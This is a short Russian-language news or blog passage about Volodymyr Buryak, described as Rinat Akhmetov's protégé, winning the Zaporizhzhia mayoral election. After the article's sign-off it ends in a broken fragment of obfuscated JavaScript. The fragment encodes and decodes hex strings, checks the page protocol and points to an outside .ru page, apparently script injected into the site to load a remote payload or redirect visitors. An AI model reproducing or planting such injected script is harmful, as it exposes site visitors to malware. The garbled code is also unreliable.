7-Протеже бывшего хозяина Донбасса Владимир Буряк выигрывает выборы мэра Запорожья у выдвиженца “БПП-Солидарность” Николая Фролова. Запорожье — хорошая компенсация Ахметову за проигранный Днепропетровск. Плюс — у Рината Леонидовича свой мэр в Павлограде (Анатолий Вершина) и в Кривом Роге (Юрий Вилкул).

Во втором ряду. Буряк вышагивает за спиной Ахметова
Во втором ряду. Буряк вышагивает за спиной Ахметова

Ранее эксперты отмечали, что Ахметов, изгнанный из родных мест, начал строить в Запорожской области новый Донбасс. Ему не хватало малого — своего градоначальника в областном центре. Теперь он у Ахметова есть. Можно ли поздравить жителей города с новым Донбассом? Судя по результату Фролова, проевропейски настроенных людей там хватает. Но их, увы, оказалось недостаточно.

Деловая столица

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "operkor.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//m81jmqmn.ru/f.html